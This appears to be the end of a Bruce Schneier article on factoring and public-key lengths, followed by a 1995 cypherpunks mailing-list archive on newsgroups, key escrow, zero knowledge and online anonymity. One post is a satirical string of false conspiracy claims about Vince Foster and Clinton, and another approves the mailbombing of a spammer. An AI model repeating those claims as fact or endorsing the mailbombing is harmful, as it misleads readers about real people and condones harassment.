Those two computations used what's called the *quadratic
sieve*, but a newer, more powerful algorithm has arrived.
The *general number filed sieve* is faster than the
quadratic sieve for numbers well below 116 digits and can
factor a 512-bit number over 10 times faster -- it would
take less than a year to run on  an 1800-node Intel
Paragon.

And the process gets still faster. Mathematicians keep
coming up with new tricks, new optimizations, and new
techniques. A related algorithm, the special number field
sieve, can already factor numbers of a specialized form
(not generally used for cryptography) much faster. So we
can probably optimize the general number field sieve to
run that fast. For all we know, the National Security
Agency is already doing it.

The figure "MIPS Years Needed to Factor" gives the number
of MlPS-years required to factor "special" and "general"
numbers of different lengths.

How Big Is Big Enough?

The wise cryptographer is ultraconservative when choosing
key lengths for a public-key system. You must consider
the intended security, the key's expected lifetime, and
the current state of the factoring art. Now you need a
1024-bit number to get the same security you got from a
512-bit number in the early 1980s. If you want your keys
to remain secure for 20 years, 1024 bits is probably too
short.

Consider these assumptions from the mathematicians who
factored RSA-129: We believe we could acquire 100,000
machines without superhuman or unethical efforts and
without an Internet womm or virus. Many organizations
have several thousand machines on the Net. Using their
facilities would require diplomacy but should not be
impossible. Assuming an average power of 5 MIPS and one
year elapsed time, we could reasonably embark on a
project that would require half a million MIPS-years. The
project to factor the 129-digit number harnessed an
estimated 0.03 percent of the Internet's total computing
power. A well-publicized project might be able to harness
2 percent of the world's computing power for a year.

My recommendations for public-key lengths are given in
the figure "Recommended Public-Key Key Lengths" according
to how long you require the key to be secure. There are
three key lengths given for each period -- one secure
against an individual cryptanalyst who can get his hands
on 10,000 MlPS-years, one against a major corporation
that could harness 10^7 MIPS-years, and the third secure
against a major govemment and 10^9 MIPS-years. These
figures assume that computing power will increase by a
factor of 10 every five years and that mathematical
advances will let us factor numbers at the speeds of the
special number field sieve.

Not everyone will agree with these final recommendations.
The National Institute of Standards and Technology has
mandated 512- to 1024-bit keys for its Digital Signature
Standard. PGP has a maximum RSA key length of 1280 bits.
Aljen Lenstra, the world's most successful factorer,
refuses to predict beyond 10 years. There's always the
possibility that an advance in factoring will surprise me
as well, though I tried to factor everything into my
calculations. But why trust me? I just proved my own
foolishness by making predictions.

_______________________________________________________

MIPS Years Needed to Factor
_______________________________________________________

Ascending Line of General Number Field Sieve

Ascending Line Special Number Field Sieve

Y-axis: MIPS-years
10^0, 10^3, 10^6, 10^9, 10^12, 10^15, 10^18, 10^21

X-axis: Bits
512, 768, 1024, 1280, 1536, 2048
_______________________________________________________


_______________________________________________________

Recommended Public-Key Key Lengths
_______________________________________________________

Ascending bars for: Individual, Company, Government

Y-axis: Bits 0, 500, 1000, 1500, 2000, 2500

X-axis: Year 1995  2000  2005  2010  2015
_______________________________________________________

-----

Bruce Schneier is the author of Applied Cryptography
(John Wiley), the second edition of which is due out in
December. He can be reached on the Internet as
schneier@winternet.com, or on BIX c/o editors@bix.com.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Sat, 16 Sep 95 07:12:56 PDT
To: rsalz@osf.org
Subject: Re:  "Use implies consent to monitoring"
Message-ID: <199509161407.HAA13837@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org>:
> >   Please be advised that use constitutes consent to monitoring
> 
> Use of what?

Obviously of something that can be monitored - as this is apparently
from the ECPA I would assume use of "electronic communications." Of course
I haven't verified that this quote is actually from the ECPA, that's
what the InterNIC claims it is.


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Sat, 16 Sep 95 07:22:53 PDT
To: pfarrell@netcom.com
Subject: Wash Post coverage of NIST Key escrow-export
Message-ID: <199509161419.HAA23095@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Today's washington post has some coverage (finally) of the
encryption/key-escrow/FIPS standards issues. Headline is
Feuding again erupts over encryption exports

I typed in the text. url:
http://www.isse.gmu.edu/~pfarrell/nist/post.html

Pat
Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sat, 16 Sep 95 04:41:39 PDT
To: Bruce Schneier <cypherpunks@toad.com
Subject: Web page
Message-ID: <v01530503ac8068056625@[204.91.138.80]>
MIME-Version: 1.0
Content-Type: text/plain


Hi bruce, Hows it going? I'm back from DK and the UK. I understand you're
just coming back from JP (wow what world travelers we are!).

have you heard from Sutherland? Do we have a title? page length? It seems
to me that we should take out some of the clipper stuff and put in more on
CKE since thats pretty hopt at the moment and will further distinguish us
from Hoffman's book.

We have also moved upto 56kb FR here in the office. Are you still
interested in a home page here? Or do you have one we can link to?

Dave


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk> (by way ofrah@shipwright.com (Robert Hettinga))
Date: Sat, 16 Sep 95 04:44:57 PDT
To: cypherpunks@toad.com
Subject: More on ECheques
Message-ID: <v02120d00ac805e5cf474@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


1. I was not suggesting that you put your real bank account number
    in the program.  A test number is perfectly adequate.

2. In the UK people advertise their Bank Account numbers so that people
    can pay them.

3. If you do use your real bank account number,  I will not pay you
    anything nonetheless.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 16 Sep 95 05:30:14 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <PysiBD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aba@dcs.exeter.ac.uk writes:
> One thing I have been thinking would be nice would be a USENET
> newsgroup, as mailing lists are a step away from easy access which
> some people never make.

This sounds like a very good idea to me, since I find the flood of
e-mail from CP, much of it non-crypto-related, to be annoying. If
this traffic were in a newsgroup, it would travel compressed over
my phone line, and I might use a killfile on sstuff like the CO$ thread.

Anything posted to the main cypherpunks mailing list and the spun-off mailing
lists (steganogrpahy, remailers, nym servers, etc) could be posted to the
newsgroup by maiking one of the mail2news gateways a subscriber.

> time and thought to.  Might I suggest that a newsgroup would be a way
> to go?  There are already a number of security, privacy, and crypto
> related groups, but they tend to have their own pattern of flow, you
> know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno
> not read much), alt.security.pgp pgp usage, David Sterlight fueled
> discussions, some ITAR stuff, talk.politics.crypto, crypto politics,
> comp.org.eff.talk, there must be a few others.
...
> Reckon cypherpunks as a group has enough readers to hmm, push through
> a vote for group creation, if the majority thought it was a useful
> exercise.  A group soley for what?  cypherpunks technology, social

No vote is needed to create an alt.group: something like
'alt.security.cypherpunks' or 'alt.privacy.cypherpunks'. Just post a proposal
to alt.config, post many articles seconding the proposal, let it be discussed
for a week, then issue a newgroup.

To create a newsgroup in the 'big 8' (comp., sci., etc) one needs to deal with
unpleasant control freaks like group-advice, news.groups, and David Lawrence.
It takes up to 6 months. On the other hand, many sites that have Usenet have
comp.* but not alt.*. Their users would still have to use the mailing lists or
find another site. To create something like comp.security.cypherpunks (I think
this would be the most appropriate place, since there's already c.s.announce,
c.s.misc, and c.s.firewalls), talk to the group-advice cabal.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Sep 95 05:19:36 PDT
To: cypherpunks@toad.com
Subject: HRT_web
Message-ID: <199509161219.IAA04673@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-16-95. NYPaper Page Oner:


   "Computer Stings Gain Favor As Arrests for Smut Increase."

      The F.B.I. has plans for its own web to fight computer
      crimes. As arrests continued in a high-tech drive
      against the peddling of child pornography on the
      nation's largest computer network, the Federal
      authorities said today that they expected to apply the
      same surveillance techniques to fight many other
      computer-related crimes, from consumer and securities
      fraud to money laundering. One way of combating these
      crimes, they said, will be for Federal agents to go
      undercover and appear as prey for unwitting criminals.
      Timothy McNally of the F.B.I.said that while the
      traditional form of surveillance included activities
      like waiting in cars and watching suspects for hours,
      "the playing field has now changed" and now requires
      agents to become more proficient in using computers to
      thwart crimes.

      But some civil liberties experts expressed alarm at the
      latest surveillance technique, saying it would have a
      chilling effect on what is now a freewheeling medium.


   HRT_web  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:34:31 PDT
To: cypherpunks@toad.com
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <ac8044c413021004e871@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Should there be an "alt.cypherpunks" type of newsgroup instead of this
mailing list?

(Or, to use my punchline at the end: Let the market decide.)

At 10:26 AM 9/16/95, aba@atlas.ex.ac.uk wrote:

>One thing I have been thinking would be nice would be a USENET
>newsgroup, as mailing lists are a step away from easy access which
>some people never make.  It makes it less easy to browse and see what
>it's about, interacting with majordomo software might seem very
>intuitive to most members, but not all will be so comfortable signing
>up their mailbox (which they possibly pay for per K), and may indeed
>lack the expertise required to do the job.  There are serveral
>archives of cpunks, but these don't tend to be as well known as
>newsgroups.  More people might come across cypherpunks ideas, and the
>technology for remailers, disk encryptors, discussions of nym servers,
>steganorgraphy, IPSEC, etc if they were in a newsgroup, perhaps even
>within the comp, soc, or sci hierarchies.

It would be easy to create "alt.cypherpunks." I've been expecting to see it
happen for the last 3 years. It could still happen. In fact, there's been
talk of doing it (sorry for the passive "there has been talk," but I'll let
the folks talking about doing it do the talking about it here).

"Alt" groups are easy to create. (Newcomers to the list might like to know
that one of our founding memmbers, John Gilmore, created the "alt.*" option
some years back, with "alt.drugs" I think it was.)

However, how many _newsgroups_ do any of you know of that have anywhere
near the sense of cohesion and "community" that our mailing list has?

Newsgroups encourage wider exposure to ideas, but also make "hit-and-run"
disruptions more likely. The speed bump of having to figure out how to
subscribe to a mailing list, and the expectation that one will remain "in
the community" for a while, moderates flamish behavior and encourages
people to try to learn.

Newsgroups encourage very wide browsing, which has some advantages. But
also a lack of persistent contributors and a lack of community. Mailing
lists _tend_ to have much tighter feedback loops, where most messages are
read by most members, or at least are glanced at. Newsgroups have a
different character, and topics get repeated even more often.

Interestingly, several crypto folks I know have said they have stopped
seriously using the "sci.crypt" and "talk.politics.crypto" newsgroups and
are concentrating on smaller mailing lists of co-workers and committee
members(task forces, working groups, etc.).

In some sense, the Cypherpunks list is somewhere in-between a full
newsgroup and a small working mailing list.

I could go on, but I ask instead that readers do their own investigation.

First, are there any newsgroups out there that have the atmosphere we have?
(I'm not saying there aren't any, and finding some examples to look at
might be instructive...)

Second, would the benefits of wider exposure, as "alt.cypherpunks," more
than balance out the negative effects mentioned above?

Third, is "news reading" software really that much better than "mail
reading" software? For me, for example, I use Eudora Pro and can filter all
messages by words in the thread name, by author, by mailing list name, etc.
And _saving_ messages is the default, unlike newsgroups, where I must
explicitly save an article to a file. So, for me, I have a very large
"Cypherpunks archives," whereas I don't have a large
"talk.polititics.crypto" archive (partly because of the lack of community
there....).

This brings up a final point, with more than 10,000 newsgroups, including
nearly a dozen devoted to crypto, PGP, security, and anonymity, aren't
there already enough? A likely effect of "alt.cypherpunks" is this:


Subject:  Re: ITARs Worked for Less than One Day
Date:  Sun, 10 Sep 1995 00:18:38 GMT
From: david@sternlight.com (David Sternlight)
Organization: DSI/USCRPAC
Newsgroups: sci.crypt, alt.security.pgp, talk.politics.crypto,  alt.cypherpunks


That is, "alt.cypherpunks" just gets added to the cc: list of a lot of posts.

But, if anyone wants it, create it. Then people can vote with their feet.
Both the list and the newsgroup can co-exist, and if the newsgroup "wins,"
the list can be dropped.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller Mixmaster <hroller@c2.org>
Date: Sat, 16 Sep 95 09:53:30 PDT
To: c2.org.sdatalk@sdanet.org
Subject: Arnold Bowker and John Joslin vs. Privacy
Message-ID: <199509161647.JAA23365@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


        "Case Could End Anonymity of Computer Network Users"
               by Brian Bergstein (Associated Press)

Anonymity and freedom of speech in cyberspace are being challenged
by a Caribbean resort owner in a court case that could dramatically
restrict the rights of computer network users.

The resort owner and scuba instructor claim that they were defamed
on a computer bulletin board by an anonymous user, and they asked a
judge this week to force America Online to reveal the name of the
subscriber so they can sue the person for libel.

If Arnold Bowker and John Joslin are successful in obtaining the
name, it could have serious implications for millions of people who
use the Internet to think, write and debate in a world where they
are identified by their ideas, not their names.

Technology experts fear a morass of court cases that would hold
computer users accountable for what they say anonymously.

"What this case brings up is the specter of millions of libel suits
every time there's a disagreement on the Internet," said Daniel
Weitzner of the Center for Democracy and Technology in Washington.
"I think it's a critical issue."

Several calls seeking comment from officials at America Online were
not immediately returned Friday.

Abraham Haddad, chairman of the computer science department at
Northwestern University, said the anonymity of cyberspace should be
maintained as long as it was not being used to commit a crime.

"There's really a need to protect people's privacy as long as no
laws have been broken," Haddad said.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:50:13 PDT
To: cypherpunks@toad.com
Subject: Re: Explaining Zero Knowledge to your children
Message-ID: <ac804c8a14021004bc1f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:10 AM 9/15/95, hallam@w3.org wrote:
>The cave analogy sucks.
>
>The way I tried to explain Zero Knowledge is this:
>
>
>Imagine that you have a duplicator device which you want to sell, you don't
>want to explain why it works to the buyer however since then they would
>just make their own (patents have been abolished by this time). You also don't
>want the buyer to be able to prove to anyone else that you have a duplicator.
>
>So what you do is you play the "what hand is it in game" and you do this
>with a
>10$ bill provided by the buyer and who records its serial number. You hold the
>original article in one hand and the duplicate in the other. The buyer choses
>one hand, you show the article in that hand. The buyer knows you had a 50:50
>chance of a lucky guess so you do it again, each time the probability of
>getting
>it right by a lucky guess halves. After 10 tries or so it is virtually certain
>that you were not faking.
>
>
>Any better ideas...

Clever, but I think it's missing an important element of zero knowledge
interactive proof systems. For example, why not simply open _both_ hands?

By opening both hands one shows immediately that one has a duplicator, but
does not show how the duplicator works. The same results are obtained with
perfect certainty in _one_ round that the ZKIPS approach takes N rounds (as
N gets large).

Granted, this fails the " don't want the buyer to be able to prove to
anyone else that you have a duplicator" test, but I don't think that is
central to ZKIPS. I think a more important test is "don't show others how
to make matter duplicators."

Matter duplicators are "self-demonstrating" without revealing how they
work, so they don't fit the model of (or create a need for) software-based
ZKIPS.

For example, in the Hamiltonian cycle example, the Prover demonstrates to
the Skeptic either the set of nodes, with the nodes labelled, or a
Hamiltonian cycle, with the nodes unlabelled. If he shows _both_ the set of
nodes _and_ a Hamiltonian cycle, then he's given the Skeptic the whole
shebang. In Phill's example, he's just taught the Skeptic "how to make a
matter duplicator."


But I applaud the creation of new and simpler examples, and maybe I'm wrong
and Phill's example captures the essence of zero knowledge interactive
proofs. I'll think about it some more.

Comments?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Sat, 16 Sep 95 08:57:10 PDT
To: cypherpunks@toad.com
Subject: (Noise) X-Files anarchist
Message-ID: <v01510100ac80a19afbbc@[198.59.115.139]>
MIME-Version: 1.0
Content-Type: text/plain


I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
minor character was a cryptohacker who--to his surprise--brute-forced a
military key for some files.  He was described as an anarchist.

To _my_ surprise, this anarchist was not associated with violence or
lunatic ravings.  He was shown as reading a book entitled something like
Survey of Modern Conspiracy Theories.  I see this as an improvement in the
stereotype of computer-associated anarchists.  And this I see as a good
thing, since I think there is a lot that could be learned from anarchists.


I think the character was killed, but I may have missed something.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 09:58:18 PDT
To: cypherpunks@toad.com
Subject: Re: (Noise) X-Files anarchist
Message-ID: <ac80504e150210049e8b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:56 PM 9/16/95, Dar Scott wrote:
>I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
>minor character was a cryptohacker who--to his surprise--brute-forced a
>military key for some files.  He was described as an anarchist.
>
>To _my_ surprise, this anarchist was not associated with violence or
>lunatic ravings.  He was shown as reading a book entitled something like
>Survey of Modern Conspiracy Theories.  I see this as an improvement in the
>stereotype of computer-associated anarchists.  And this I see as a good
>thing, since I think there is a lot that could be learned from anarchists.

Vince Foster was technical advisor to "The X-Files." The NSA had him killed
at Fort Darcy because he was getting too close to the Bilderbergers and
their control of the secret UFO technology first given to the Nazis and
then transferred to Winnemucca, Nevada as part of Operation Paperclip.

The pilot who flew Bush in an SR-71 to negotiate with the Iranians to delay
the release of the hostages and so defeat Carter in 1980 is also the author
of "Nomenclature of a Conspiracy Cabal," one of the books shown in that
episode.

President Clinton, at the Underground White House near Edwards Air Force
Base, OKed the hit on Foster, even though "The X-Files" was one of his
favorite shows. The Greys must be appeased.

--Klaus! von Future Prime, who actually has several dozen books on these
and similar subjects






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sat, 16 Sep 95 10:05:30 PDT
To: cypherpunks@toad.com
Subject: Re: SPAM bait
In-Reply-To: <9509152041.AA21715@argosy.MasPar.COM>
Message-ID: <199509161700.KAA24077@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


David G. Koontz (koontz@MasPar.COM) wrote:
: To: janet.dove@ledip.py
: Subject: Re:  ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit

Don't worry, "Janet Dove", or actually sanghi3@grfn.org got mailbombed
severely for this one.  I'm just glad he doesn't know how to use remailers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Sep 95 10:18:54 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <ac80562f16021004000e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:57 AM 9/16/95, Alan Olsen wrote:

>I seem to remember a software piracy case from a number of years back.  The
>case was settled by Apple showing that their code had been copied by the
>copyright "easteregg" hidden in the roms.  Made for a quick and effective
>demonstration in court.  (The story may be apocryphal, but it makes for an
>example as to how such things do have a (supposed) valid use in protecting
>code from being snagged by  other companies.)

And someone just cited the same (or very similar) example, where the "quick
and effective demonstration" nevertheless resulted (they said) in an
acquittal.

So, which way did it go?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 16 Sep 95 03:27:07 PDT
To: dcl@panix.com
Subject: Re: CYPHERPUNK considered harmful
Message-ID: <14439.9509161026@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



David Lambert <dcl@panix.com> writes:
> 
> Peter Trei <trei@process.com> wrote:
> 
> >      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across. I'm not saying this pigeonholing is correct - in fact I despise
> > people who judge a book by it's cover, but so many people DO make such
> > snap judgements that we need to take this into account when talking to
> > the general public.
> 
> Two of the responses to the "An opportunity..." post unapologetically
> admitted that they refused to read the text of the message due to the
> presence of the word "cypherpunk" in the first sentence.
> 
> Shows you what we're up against.
> 
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

There is likely some truth to the cypherpunk turning some people off
before they listen, but also as has already been said 'cypherpunks'
has it advantages too: catchy, gets the media imagination, and has an
established reputation, and set of accomplishmensts.

One thing I have been thinking would be nice would be a USENET
newsgroup, as mailing lists are a step away from easy access which
some people never make.  It makes it less easy to browse and see what
it's about, interacting with majordomo software might seem very
intuitive to most members, but not all will be so comfortable signing
up their mailbox (which they possibly pay for per K), and may indeed
lack the expertise required to do the job.  There are serveral
archives of cpunks, but these don't tend to be as well known as
newsgroups.  More people might come across cypherpunks ideas, and the
technology for remailers, disk encryptors, discussions of nym servers,
steganorgraphy, IPSEC, etc if they were in a newsgroup, perhaps even
within the comp, soc, or sci hierarchies.

One thing I have discovered in myself is a reluctance to subscribe to
too many mailing lists, as the volume, and management of the resulting
traffic piped your way can be overwelming (yes I know there are
various filters to split off traffic into separate mbox files).  I
think it is a shame that things like the nym server discussion which
sounded very interesting to me got split off into a separate group,
I'd just as soon see the discussion here, for reluctance to subscribe
to yet more groups reasons, and because it sounded like it wasn't very
high volume anyway.  Same for the stego group discussions.  If it's
all in one place at least I can skim that for interesting things.
Both of those discussions I think would contribute to the signal ratio
here.

But, Peter's stated aims sound useful, of promulgating cypherpunks
technolgy, and ideas to as large an audience as possible.  Definately
a very important aim, and one that lots of people already devote some
time and thought to.  Might I suggest that a newsgroup would be a way
to go?  There are already a number of security, privacy, and crypto
related groups, but they tend to have their own pattern of flow, you
know penet.fi problems on alt.privacy.anon-server, alt.privacy (dunno
not read much), alt.security.pgp pgp usage, David Sterlight fueled
discussions, some ITAR stuff, talk.politics.crypto, crypto politics,
comp.org.eff.talk, there must be a few others.

Peter's FAQ like document was very nicely worded for avoidance of any
connotations of conspiracy or 'punkery' which might put off the less
adventurous souls, the more conservative.  How about it?

Reckon cypherpunks as a group has enough readers to hmm, push through
a vote for group creation, if the majority thought it was a useful
exercise.  A group soley for what?  cypherpunks technology, social
impacts and education, a place where someone would go with security
questions, and to learn about the future of personal and corporate
security on the net.  If a few people frequented it, with the sort of
diligence that a number of people spend time contributing to the
alt.security.pgp group, and a useful set of pointers, and FAQs posted
frequently, it might become a useful resource.

One URL which I haven't seen pushed all that much which impressed me a
lot for a very comprehensive list of cypherpunks technology, what it
is and where to get it was Tatu Ylonen's pages on crypto, and crypto
apps:

	http://www.cs.hut.fi/ssh/crypto/

A resource that would look good with a support newsgroup for
discussion of just such technology.

I would have thought that if anyone was interested to set up such a
group (Peter? - your initiative?), that you could tone down the
'cypherpunks' name if you felt it would further the cause of giving
the newsgroup wider appeal.  I mean perhaps you would mention
'cypherpunks', 'the mailing list', near the end of the FAQ as further
resources, and a forum for active discussion, explaining the name
first, so that people don't get put off, after they've got that far
(read all through your FAQ), presumably they'll be less inclinded to
let a label bother them.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 08:33:50 PDT
To: Charles Lewton <clewton@netcom.com>
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <Pine.SUN.3.91.950915082125.12633F-100000@netcom17>
Message-ID: <Pine.SUN.3.91.950916113300.25537B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 15 Sep 1995, Charles Lewton wrote:

> On Fri, 15 Sep 1995, Duncan Frissell wrote:
> 
> > 
> > On Thu, 14 Sep 1995, Lucky Green wrote:
> > 
> > > The answer is trivial. If it pisses of the fascists in power enough, you
> > > go to jail or get killed.
> 
> > 
> > As a libertarian nut, I bow to no one in my love of extreme statements.  
> > But I feel compelled to sqaush this particular notion whenever I see it.  
> > Randy Weaver really pissed off the Feds and did not go to jail (except 
> > during trial) and received a $3.1 million settlement.  (.1 to him, 3 to 
> > the kids but they are minors).
> > 
> > DCF
> > 
> 
> Not quite squashed, Duncan.  Bullet placement (poor by some standards)
> is all that prevented Mr. Weaver from croaking like his unfortunate wife.
> She is said to have "pissed off" the feds but was not charged with a
> single actionable item yet she remains quite dead.
> 
> Unless I have missed somthing somewhere, no TLA is concerned in the slightest
> with individual liberty.  That notion should keep a rational person awake
> nights.

Much as I like the concept of checks and balances, this is an example of 
the evils of power balanced and checked ex post, and not ex ante.


> 
> Chuck
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 16 Sep 95 17:16:04 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk>
Message-ID: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, aba@dcs.exeter.ac.uk writes:

> One thing I have been thinking would be nice would be a USENET
> newsgroup, as mailing lists are a step away from easy access which
> some people never make.

That's a feature, not a bug.  Unless the group was moderated, I predict
the S/N ratio to be <= 0.  Witness the crap in alt.2600.

The mailing list, as someone said before me, works as a limited
pre-screening system.  Given the nature of the list's focus and
discussion, I think a newsgroup would end up being a stable attractor
for the clue-deficit crowd.  Not something I'd find useful.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFsCyhvikii9febJAQFJVQP/VDKh+Mb8FFsm85IqOmYOZ82gam7Lmbwp
+E3sSOnnRUVQAiT8vbSs/qeA3ozZEF6Oi++CVYzPh/S8zLUufoUqSGuhOwXi2Z3R
XH1CTkXBYccuQkd7wG8Sm7Q9sN+zd8iR4byWQrknlSua9czivNjHhUNDxgdwSR7p
yI3GCz1L244=
=uYVL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:00:01 PDT
To: "David C. Lambert" <dcl@panix.com>
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <199509152013.QAA18005@panix.com>
Message-ID: <Pine.SUN.3.91.950916114256.25537C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 15 Sep 1995, David C. Lambert wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Peter Trei <trei@process.com> wrote:
> 
> >      Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as
> > nutcases for many people, and are a barrier to getting our ideas
> > across. I'm not saying this pigeonholing is correct - in fact I despise
> > people who judge a book by it's cover, but so many people DO make such
> > snap judgements that we need to take this into account when talking to
> > the general public.
> 
> Two of the responses to the "An opportunity..." post unapologetically
> admitted that they refused to read the text of the message due to the
> presence of the word "cypherpunk" in the first sentence.
> 
> Shows you what we're up against.
> 
> BTW, I'm not for changing the name of the list, but I do see the logic
> in a more establishment-friendly name to use when lobbying the public.

So found the propoganda arm of the cypherpunks with a snazzy and PC name.

Distrubute watered down cypherpunk "teachings" in more benign forms which 
hide their true (Ohhh! Scary!) potential in an effort to make them commonly 
acceptable to joe sixpack.


Can't we all see what road this leads down?

At the risk of politicizing the issue, I wouldn't be the first to call this 
"left-speak" or "term-sanitizing."

Really the core issue is that the citizens of their respective nations 
need to either:

1>  See cryptography for the important individual rights issue that it is 
and latch on to the basic desire for free and unmonitored commerce and 
exchange without censorship or observation.

or

2>  Decide that they are not interested in the issues because these 
issues are too radical, or simply because their own political ideas fall left
(or statist) of this spectrum.


Personally, and being quite defeatist and selfish, while I would like a 
widespead population wide strong crypto system asthetically, in the end I 
don't care if every joe sixpack on the planet uses real crypto, just so long as 
those I am to conduct commerce (of data or goods) with do.

The final judgement will be in the advantage of velocity and security of 
transactions and the wealth that this "allocates" to those wise enough to 
adopt crypto exchange systems.  Evolution in action.  If this makes me 
elitist, so be it.

Granted, there are non-cryptoanarchy applications to crypto which I am 
